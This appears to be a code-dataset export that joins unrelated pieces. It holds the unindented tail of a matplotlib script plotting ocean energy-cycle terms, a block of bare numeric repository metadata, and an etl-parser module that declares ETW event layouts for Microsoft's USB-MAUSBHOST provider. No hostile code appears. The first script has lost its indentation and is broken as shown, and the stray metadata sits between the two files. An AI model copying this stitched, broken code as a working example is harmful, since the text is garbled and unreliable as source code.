plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.24+b, "$\pm${:2.0f}".format(abs(POP_var[i])/1e9)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
else:
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.24+b, "$\pm${:2.1f}".format(abs(POP_var[i])/1e9)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
elif i==16: # boundary term
a = .16/np.sqrt(2)
plt.text(grid[pos[i]][0]+a , grid[pos[i]][1]+a, titles[i], rotation=-45,\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0] , grid[pos[i]][1],\
"({:4.1f}".format(abs(POP[i]/total)*100.0)+' %)', rotation=-45,\
ha="center",va="center", family='sans-serif', size=14)
plt.text(grid[pos[i]][0]-a , grid[pos[i]][1]-a,\
"{:4.0f}".format(POP[i]/1e9)+' GW', rotation=-45,\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0]-2*a, grid[pos[i]][1]-2*a,\
"$\pm${:2.0f}".format(abs(POP_var[i])/1e9)+' GW', rotation=-45,\
ha="center",va="center", family='sans-serif', size=16)
patches2.append(arrw)
color_values2.append(abs(POP[i]))
collection1 = PatchCollection(patches1, color='CornflowerBlue', alpha=.6)
ax.add_collection(collection1)
collection2 = PatchCollection(patches2, cmap='autumn', alpha=.7)
collection2.set_array(np.array(-np.array(color_values2)))
ax.add_collection(collection2)
plt.axis('off')
plt.savefig('../../results/SOM_paper/LEC4_BT_overview_'+name+'.png',bbox_inches='tight',dpi=100, author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_BT_overview_'+name+'.eps',bbox_inches='tight',format='eps', author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_BT_overview_'+name+'.pdf',bbox_inches='tight',format='pdf', author='Andre Jueling')
start_year=278
end_year = 325
for t in range(start_year, end_year):
fh = '../../results/analyze_LEC/analysis_LEC_5_'+str(t)+\
'_SO30.out'
tmp = pd.read_csv(fh)
tmp.index = [t]
if t==start_year: df = tmp.drop([t])
df = df.append(tmp)
del tmp, fh
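# Sketch of an equivalent way to build the same DataFrame (not the author's original
# code): pandas.concat avoids the deprecated DataFrame.append and the empty-frame trick
# used above; the file paths and '_SO30' suffix are taken from the loop.
# frames = []
# for t in range(start_year, end_year):
#     tmp = pd.read_csv('../../results/analyze_LEC/analysis_LEC_5_'+str(t)+'_SO30.out')
#     tmp.index = [t]
#     frames.append(tmp)
# df = pd.concat(frames)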
dfg, dfg_anom, dfg_norm = LEC_global('../../results',5)
df_SO30, df_SO30_anom, df_SO30_norm = analyze_LEC('../../results',5,'SO30')
df_WGKP, df_WGKP_anom, df_WGKP_norm = analyze_LEC('../../results',5,'WGKP')
if __name__ == "__main__":
LEC4_overview(dfg,'global','a')
LEC4_BT_overview(df_SO30,'SO30','b')
LEC4_BT_overview(df_WGKP,'WGKP','c')
| 50.973154
| 129
| 0.512179
| 2,307
| 15,190
| 3.274816
| 0.107499
| 0.061152
| 0.069887
| 0.040503
| 0.869887
| 0.85824
| 0.856651
| 0.856651
| 0.856651
| 0.848312
| 0
| 0.061809
| 0.261883
| 15,190
| 298
| 130
| 50.973154
| 0.612023
| 0.025806
| 0
| 0.72332
| 0
| 0
| 0.13788
| 0.030775
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007905
| false
| 0
| 0.031621
| 0
| 0.039526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
287e63dc77c9a3c3cd4d264ca26f6865a9af7243
| 53,063
|
py
|
Python
|
etl/parsers/etw/Microsoft_Windows_USB_MAUSBHOST.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 104
|
2020-03-04T14:31:31.000Z
|
2022-03-28T02:59:36.000Z
|
etl/parsers/etw/Microsoft_Windows_USB_MAUSBHOST.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 7
|
2020-04-20T09:18:39.000Z
|
2022-03-19T17:06:19.000Z
|
etl/parsers/etw/Microsoft_Windows_USB_MAUSBHOST.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 16
|
2020-03-05T18:55:59.000Z
|
2022-03-01T10:19:28.000Z
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-USB-MAUSBHOST
GUID : 7725b5f9-1f2e-4e21-baeb-b2af4690bc87
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
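# Each class below describes one ETW event of the Microsoft-Windows-USB-MAUSBHOST
# provider: the @declare decorator ties the class to the provider GUID, event_id and
# version, and 'pattern' is a construct Struct describing the event's user-data layout.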
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=3, version=0)
class Microsoft_Windows_USB_MAUSBHOST_3_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfDevicePowerState" / Int32ul
)
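# Illustrative only (not part of the generated parser): 'pattern' is a plain construct
# Struct, so a raw user-data payload can be decoded with its parse() method. The byte
# string here is a made-up example, not captured trace data.
# payload = (1).to_bytes(8, 'little') + (4).to_bytes(4, 'little')
# event = Microsoft_Windows_USB_MAUSBHOST_3_0.pattern.parse(payload)
# assert event.fid_Controller == 1 and event.fid_WdfDevicePowerState == 4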
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=4, version=0)
class Microsoft_Windows_USB_MAUSBHOST_4_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=5, version=0)
class Microsoft_Windows_USB_MAUSBHOST_5_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Float32l,
"fid_IsLinkManaged" / Int8ul,
"fid_CreditConsumptionUnit" / Int16ul,
"fid_BufferSize" / Int32ul,
"fid_IsochProgrammingDelay" / Int16ul,
"fid_IsochResponseDelay" / Int16ul,
"fid_IsochSegmentsPerFrame" / Int32ul,
"fid_MaxIsochSegmentSize" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=6, version=0)
class Microsoft_Windows_USB_MAUSBHOST_6_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfDevicePowerState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=7, version=0)
class Microsoft_Windows_USB_MAUSBHOST_7_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfDevicePowerState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=8, version=0)
class Microsoft_Windows_USB_MAUSBHOST_8_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=9, version=0)
class Microsoft_Windows_USB_MAUSBHOST_9_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=10, version=0)
class Microsoft_Windows_USB_MAUSBHOST_10_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=11, version=0)
class Microsoft_Windows_USB_MAUSBHOST_11_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=12, version=0)
class Microsoft_Windows_USB_MAUSBHOST_12_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=13, version=0)
class Microsoft_Windows_USB_MAUSBHOST_13_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=15, version=0)
class Microsoft_Windows_USB_MAUSBHOST_15_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=16, version=0)
class Microsoft_Windows_USB_MAUSBHOST_16_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=17, version=0)
class Microsoft_Windows_USB_MAUSBHOST_17_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=18, version=0)
class Microsoft_Windows_USB_MAUSBHOST_18_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=19, version=0)
class Microsoft_Windows_USB_MAUSBHOST_19_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=20, version=0)
class Microsoft_Windows_USB_MAUSBHOST_20_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=21, version=0)
class Microsoft_Windows_USB_MAUSBHOST_21_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Capability" / Guid,
"fid_NtStatus" / Int32ul,
"fid_NumStaticStreams" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=50, version=0)
class Microsoft_Windows_USB_MAUSBHOST_50_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=51, version=0)
class Microsoft_Windows_USB_MAUSBHOST_51_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=52, version=0)
class Microsoft_Windows_USB_MAUSBHOST_52_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=53, version=0)
class Microsoft_Windows_USB_MAUSBHOST_53_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=54, version=0)
class Microsoft_Windows_USB_MAUSBHOST_54_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Error" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=55, version=0)
class Microsoft_Windows_USB_MAUSBHOST_55_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_ExpectedSubtype" / Int32ul,
"fid_ActualSubtype" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=56, version=0)
class Microsoft_Windows_USB_MAUSBHOST_56_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=57, version=0)
class Microsoft_Windows_USB_MAUSBHOST_57_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=58, version=0)
class Microsoft_Windows_USB_MAUSBHOST_58_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=59, version=0)
class Microsoft_Windows_USB_MAUSBHOST_59_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul,
"fid_Size" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=60, version=0)
class Microsoft_Windows_USB_MAUSBHOST_60_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=61, version=0)
class Microsoft_Windows_USB_MAUSBHOST_61_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=62, version=0)
class Microsoft_Windows_USB_MAUSBHOST_62_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=63, version=0)
class Microsoft_Windows_USB_MAUSBHOST_63_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=64, version=0)
class Microsoft_Windows_USB_MAUSBHOST_64_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=65, version=0)
class Microsoft_Windows_USB_MAUSBHOST_65_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=66, version=0)
class Microsoft_Windows_USB_MAUSBHOST_66_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=67, version=0)
class Microsoft_Windows_USB_MAUSBHOST_67_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=70, version=0)
class Microsoft_Windows_USB_MAUSBHOST_70_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_MaUsbEndpointHandle" / Int16ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_TransferBufferLength" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=71, version=0)
class Microsoft_Windows_USB_MAUSBHOST_71_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_MaUsbEndpointHandle" / Int16ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_BytesTransferred" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=72, version=0)
class Microsoft_Windows_USB_MAUSBHOST_72_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RemainingSizeOrCredit" / Int32ul,
"fid_BytesTotal" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_FlagBitRetry" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=73, version=0)
class Microsoft_Windows_USB_MAUSBHOST_73_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_MaUsbStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=74, version=0)
class Microsoft_Windows_USB_MAUSBHOST_74_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_Length" / Int16ul,
"fid_MaUsbStatus" / Int32ul,
"fid_AckRequest" / Int8ul,
"fid_FlagBitRetry" / Int8ul,
"fid_RemainingSizeOrCredit" / Int32ul,
"fid_EndOfTransfer" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=75, version=0)
class Microsoft_Windows_USB_MAUSBHOST_75_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=76, version=0)
class Microsoft_Windows_USB_MAUSBHOST_76_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_P_Out_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=77, version=0)
class Microsoft_Windows_USB_MAUSBHOST_77_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=78, version=0)
class Microsoft_Windows_USB_MAUSBHOST_78_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Synch_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=79, version=0)
class Microsoft_Windows_USB_MAUSBHOST_79_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Container_Id_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=80, version=0)
class Microsoft_Windows_USB_MAUSBHOST_80_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Link_Sleep_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=100, version=0)
class Microsoft_Windows_USB_MAUSBHOST_100_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_Irp" / Int64ul,
"fid_IoChannelHandle" / Int64ul,
"fid_NumberOfBytes" / Int64ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=101, version=0)
class Microsoft_Windows_USB_MAUSBHOST_101_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_Irp" / Int64ul,
"fid_NumberOfBytes" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=102, version=0)
class Microsoft_Windows_USB_MAUSBHOST_102_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_IoChannelHandle" / Int64ul,
"fid_NumberOfBytes" / Int64ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=103, version=0)
class Microsoft_Windows_USB_MAUSBHOST_103_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_NumberOfBytes" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=104, version=0)
class Microsoft_Windows_USB_MAUSBHOST_104_0(Etw):
pattern = Struct(
"fid_FdoContext" / Int64ul,
"fid_LocalAddressLength" / Int32ul,
"fid_LocalAddress" / Bytes(lambda this: this.fid_LocalAddressLength),
"fid_RemoteAddressLength" / Int32ul,
"fid_RemoteAddress" / Bytes(lambda this: this.fid_RemoteAddressLength),
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=105, version=0)
class Microsoft_Windows_USB_MAUSBHOST_105_0(Etw):
pattern = Struct(
"fid_FdoContext" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=106, version=0)
class Microsoft_Windows_USB_MAUSBHOST_106_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=108, version=0)
class Microsoft_Windows_USB_MAUSBHOST_108_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_ControllerResetReason" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=109, version=0)
class Microsoft_Windows_USB_MAUSBHOST_109_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Float32l,
"fid_IsLinkManaged" / Int8ul,
"fid_CreditConsumptionUnit" / Int16ul,
"fid_BufferSize" / Int32ul,
"fid_IsochProgrammingDelay" / Int16ul,
"fid_IsochResponseDelay" / Int16ul,
"fid_IsochSegmentsPerFrame" / Int32ul,
"fid_MaxIsochSegmentSize" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=110, version=0)
class Microsoft_Windows_USB_MAUSBHOST_110_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=111, version=0)
class Microsoft_Windows_USB_MAUSBHOST_111_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=112, version=0)
class Microsoft_Windows_USB_MAUSBHOST_112_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=113, version=0)
class Microsoft_Windows_USB_MAUSBHOST_113_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
